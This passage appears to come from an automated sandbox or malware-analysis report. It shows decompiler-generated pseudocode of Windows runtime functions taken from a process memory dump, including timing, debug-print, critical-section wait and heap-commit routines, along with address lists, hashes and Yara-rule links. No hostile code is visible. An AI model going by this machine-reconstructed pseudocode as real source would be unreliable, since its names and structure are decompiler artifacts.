					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04D27D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04DD8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04D49E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04D4B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04D4CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04D27D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04DD8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04D4AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4df8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4df862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4df8628; // 0x0
							_t116 =  *0x4df862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x04d2b94c
0x04d2b956
0x04d2b95c
0x04d2b95e
0x04d2b964
0x04d2b969
0x04d2b96d
0x04d2b96d
0x04d2b970
0x04d2b974
0x04d2b97a
0x04d2badf
0x04d2badf
0x04d2bae2
0x04d2bae4
0x04d2bae6
0x04d2baf0
0x04d72cb8
0x04d2baf6
0x04d2baf6
0x04d2baf6
0x04d2bafd
0x04d2bb1f
0x04d2bb1f
0x04d2baff
0x04d2bb00
0x04d2bb00
0x04d2bb03
0x04d2bb03
0x04d2bacb
0x04d2bacf
0x04d2bad0
0x04d2bad1
0x04d2badc
0x04d2badc
0x04d2b980
0x04d2b980
0x04d2b988
0x04d2b98b
0x04d2b98d
0x04d2b990
0x04d2b993
0x04d2b999
0x04d2b99b
0x04d2b9a1
0x04d2b9a5
0x04d2b9aa
0x04d2b9b0
0x04d2b9bb
0x04d2b9c0
0x04d2b9c3
0x04d2b9ca
0x04d2b9cc
0x04d2b9cf
0x04d2b9d3
0x04d2b9d7
0x04d2ba94
0x04d2ba94
0x04d2ba98
0x04d2baa3
0x04d72ccb
0x04d2baa9
0x04d2baa9
0x04d2baa9
0x04d2bab1
0x04d72cd5
0x04d72cdd
0x04d72cdd
0x04d2babb
0x04d2babc
0x04d2bac2
0x04d2bac3
0x04d2bac3
0x04d2bac6
0x00000000
0x04d2b9dd
0x04d2b9dd
0x04d2b9e7
0x04d2b9e7
0x04d2b9ec
0x04d2b9ec
0x04d2b9f1
0x04d2b9f5
0x04d2b9fa
0x04d2ba00
0x04d2ba0c
0x04d2ba10
0x04d2ba10
0x04d2ba12
0x04d2ba18
0x00000000
0x00000000
0x04d2bb26
0x04d2bb26
0x04d2ba1e
0x04d2ba1e
0x04d2ba23
0x04d2ba25
0x04d2ba2c
0x04d2ba30
0x04d2ba35
0x04d2ba35
0x04d2ba41
0x04d2ba46
0x04d2ba4c
0x04d2ba50
0x04d2ba54
0x04d2ba6a
0x04d2ba6e
0x04d2ba70
0x04d2ba74
0x04d2ba78
0x04d2ba7a
0x04d2ba7c
0x04d2ba8e
0x04d2ba90
0x04d2ba92
0x04d2bb14
0x04d2bb14
0x04d2bb16
0x04d2bb16
0x00000000
0x04d2ba7c
0x04d2bb0a
0x04d2bb0d
0x00000000
0x00000000
0x00000000
0x04d2bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D2B9A5

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 526930f6b946f8cfeb939c22e84d6412d581c453cacba063cdf771b90487b0d5
Instruction ID: 46f0b79e9de602a52150e59dfd49843cc9b0535ef07c3b7d385b6cb9e73c39e0
Opcode Fuzzy Hash: 526930f6b946f8cfeb939c22e84d6412d581c453cacba063cdf771b90487b0d5
Instruction Fuzzy Hash: 4B514671A08360DFC720DF29C68092ABBE5FB98708F14496EF99587344E7B1F944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04D0B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04D0B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4ddf7a8);
				E04D5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04D5D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04D4D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04D4F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04D5DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04D4B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04D4B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04D4E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04D4A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x04d0b171
0x04d0b171
0x04d0b171
0x04d0b171
0x04d0b171
0x04d0b176
0x04d0b17b
0x04d0b180
0x04d0b186
0x04d0b18f
0x04d0b198
0x04d0b1a4
0x04d0b1aa
0x04d64802
0x04d64802
0x04d64805
0x04d6480c
0x04d6480e
0x04d0b1d1
0x04d0b1d3
0x04d0b1de
0x04d0b1de
0x04d64817
0x04d6481e
0x04d64820
0x04d64822
0x04d64822
0x04d64824
0x04d64824
0x04d6482a
0x00000000
0x00000000
0x04d64835
0x04d6483a
0x04d6483d
0x04d6483f
0x04d64842
0x04d64842
0x04d64842
0x04d64846
0x04d6484c
0x04d6484e
0x04d64851
0x04d64851
0x04d64853
0x04d64854
0x04d64854
0x04d64858
0x04d6485a
0x04d6485a
0x04d6485d
0x04d6485f
0x04d64861
0x04d64861
0x04d64866
0x04d6486b
0x04d6486e
0x04d64871
0x04d64876
0x04d64876
0x04d64878
0x04d6487b
0x04d64884
0x04d64884
0x00000000
0x04d6487d
0x04d6487d
0x04d64882
0x04d64889
0x04d64889
0x04d6488f
0x04d64891
0x04d648e0
0x04d648e2
0x04d648e4
0x04d648e4
0x04d648e7
0x04d648e7
0x04d648ed
0x04d648f4
0x04d648f6
0x04d64951
0x04d64951
0x04d64953
0x04d64953
0x04d64956
0x04d64956
0x04d64958
0x04d64959
0x04d64959
0x04d6495d
0x04d6495d
0x04d6495f
0x04d6495f
0x04d64965
0x04d64969
0x04d649ba
0x04d649ba
0x04d649c1
0x04d649c5
0x04d649cc
0x04d649d4
0x04d649d7
0x04d649da
0x04d649e4
0x04d649e5
0x04d649f3
0x04d64a02
0x00000000
0x04d64a02
0x04d64972
0x04d64974
0x00000000
0x00000000
0x04d64976
0x04d64979
0x04d64982
0x04d64983
0x04d64984
0x04d6498b
0x04d6498d
0x04d64991
0x04d64993
0x04d64999
0x04d6499d
0x04d649a2
0x04d649a2
0x04d649a2
0x04d64999
0x04d649ac
0x00000000
0x04d649b3
0x04d648f8
0x04d648fe
0x00000000
0x00000000
0x00000000
0x04d648fe
0x04d64895
0x04d6489c
0x04d648ad
0x04d648b2
0x04d648b5
0x04d648b7
0x04d648ba
0x04d648bc
0x04d648c6
0x04d648c6
0x04d648cb
0x04d648d1
0x04d648d4
0x04d648d8
0x04d648d8
0x00000000
0x04d648d8
0x04d648be
0x04d648c0
0x00000000
0x00000000
0x04d648c2
0x00000000
0x00000000
0x00000000
0x04d648c4
0x00000000
0x04d64882
0x04d6487b
0x04d64904
0x04d64906
0x00000000
0x00000000
0x04d64908
0x04d6490e
0x00000000
0x00000000
0x04d64910
0x04d64917
0x04d64917
0x00000000
0x04d64917
0x04d0b1ba
0x04d647f9
0x04d647fc
0x00000000
0x00000000
0x00000000
0x04d647fc
0x04d0b1c0
0x04d0b1c0
0x04d0b1c3
0x04d0b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 04D648AD

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: e54cb70f91b313033c7818e561406acff0824140a86e2a6c944c345d7535766f
Instruction ID: 2ed2b74afff38f243c068440465fe05d7ba6de204eff07e7ffde6dbf85e3db5c
Opcode Fuzzy Hash: e54cb70f91b313033c7818e561406acff0824140a86e2a6c944c345d7535766f
Instruction Fuzzy Hash: 6C51E071E002598FEF35CF64C844BAEBBB1FF41714F1081AED85AAB281D770A9458B95

Uniqueness

Uniqueness Score: -1.00%

Function 04D02D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E04D02D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4df5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4df7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04D497C0();
				}
				if( *0x4df79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4df79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04D31624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04D27D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04D9FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04D49520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04D3E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04D5DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4df6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4df6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04D49980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04D495D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04D27D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04D27D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04D87016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04D9FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4df5350;
							if(_t109 != 0x4df5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04D9FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04D95720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x04d02d8a
0x04d02d8a
0x04d02d92
0x04d02d96
0x04d02d9e
0x04d02da0
0x04d02da3
0x04d02da5
0x04d02da8
0x04d02dab
0x04d02db2
0x04d5f9aa
0x04d5f9ab
0x04d5f9ae
0x04d5f9ae
0x04d02db8
0x04d02dc2
0x04d5f9b9
0x04d5f9be
0x04d5f9bf
0x04d5f9bf
0x04d02dcf
0x04d5f9c9
0x04d02dd5
0x04d02dd5
0x04d02dd5
0x04d02dde
0x04d02de1
0x04d02e70
0x04d02e72
0x04d02e72
0x04d02de7
0x04d02deb
0x04d02e7c
0x04d02e83
0x04d02e85
0x04d02e8b
0x04d02e8d
0x04d02e92
0x04d02e92
0x04d02e85
0x04d02df1
0x04d02df7
0x04d02df9
0x04d02df9
0x04d02dfc
0x04d02dff
0x04d02e02
0x00000000
0x04d02e05
0x04d02e0c
0x04d5f9d9
0x04d02e12
0x04d02e12
0x04d02e12
0x04d02e1a
0x04d5f9e3
0x04d5f9e9
0x04d5f9f0
0x04d5f9f6
0x04d5f9f8
0x04d5f9f8
0x04d5f9f0
0x04d02e23
0x04d5fa02
0x04d5fa03
0x04d5fa05
0x04d5fa06
0x00000000
0x04d02e29
0x04d02e29
0x04d02e2e
0x04d02e34
0x04d02e3e
0x00000000
0x00000000
0x04d02e44
0x04d02e47
0x04d02e4d
0x00000000
0x00000000
0x04d02e4f
0x04d02e54
0x00000000
0x00000000
0x04d02e5a
0x04d02e5f
0x04d02e9a
0x04d02ea4
0x04d02ea5
0x04d02ea8
0x04d02eaf
0x04d02eb2
0x04d02eb5
0x04d5fae9
0x04d5faeb
0x04d5faed
0x04d5faef
0x04d5faf7
0x04d5faf8
0x04d5fafd
0x04d5faff
0x04d5fb04
0x04d5fb04
0x04d5faff
0x04d02ec0
0x04d02ec4
0x04d02ec6
0x04d02ec8
0x04d5fb14
0x04d5fb18
0x04d5fb1e
0x04d5fb21
0x04d5fb21
0x04d02ece
0x04d02ece
0x04d02ece
0x04d02ed7
0x04d02e61
0x04d02e63
0x04d5fa6b
0x04d5fa71
0x04d5fa76
0x04d5fa78
0x04d5fa8a
0x04d5fa7a
0x04d5fa83
0x04d5fa83
0x04d5fa8f
0x04d5fa91
0x04d5fa97
0x04d5fa9d
0x04d5faa4
0x04d5faaa
0x04d5faaf
0x04d5fab1
0x04d5fac3
0x04d5fab3
0x04d5fabc
0x04d5fabc
0x04d5fac8
0x04d5facb
0x04d5fadf
0x04d5fadf
0x04d5facb
0x04d5faa4
0x04d5fa91
0x04d02e6f
0x04d02e6f
0x04d02e5f
0x04d5fa13
0x04d5fa15
0x04d5fa17
0x04d5fa1f
0x04d5fa21
0x04d5fa22
0x04d5fa25
0x04d5fa28
0x04d5fa2f
0x04d5fa2f
0x04d5fa2a
0x04d5fa2a
0x04d5fa2a
0x04d5fa31
0x04d5fa34
0x04d5fa36
0x04d5fa3c
0x04d5fa3e
0x04d5fa41
0x04d5fa43
0x04d5fa45
0x04d5fa45
0x04d5fa41
0x04d5fa3c
0x04d5fa4a
0x04d5fa4f
0x04d5fa51
0x04d5fa53
0x04d5fa56
0x04d5fa5b
0x04d5fa5e
0x00000000
0x04d5fa5e
0x04d02e23

Strings

RTL: Re-Waiting, xrefs: 04D5FA4A

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: b9a4d410d830bac4da788a6bcc1112e83c9c3666ed5a25f87c7e5bf245c141bf
Instruction ID: 5e2899c076c65073a6ee877cd9e1a688c249a377e1a7197f54556aba72074cef
Opcode Fuzzy Hash: b9a4d410d830bac4da788a6bcc1112e83c9c3666ed5a25f87c7e5bf245c141bf
Instruction Fuzzy Hash: 96612431B01604ABEF31DF68C888B7E77A5FB41318F1446AAD851DB2D1DB74BD0187A2

Uniqueness

Uniqueness Score: -1.00%

Function 04DD0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04DD0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04DCFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04DD1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04D49730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04DCA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04DCA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4df8b04 >> 0x14) + (_v44 -  *0x4df8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04D27D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04DC138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04D27D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04DBFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4df8724 & 0x00000008) != 0) {
						E04DC52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04DD15B5(0x4df8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x04dd0eb7
0x04dd0eb9
0x04dd0ec0
0x04dd0ec2
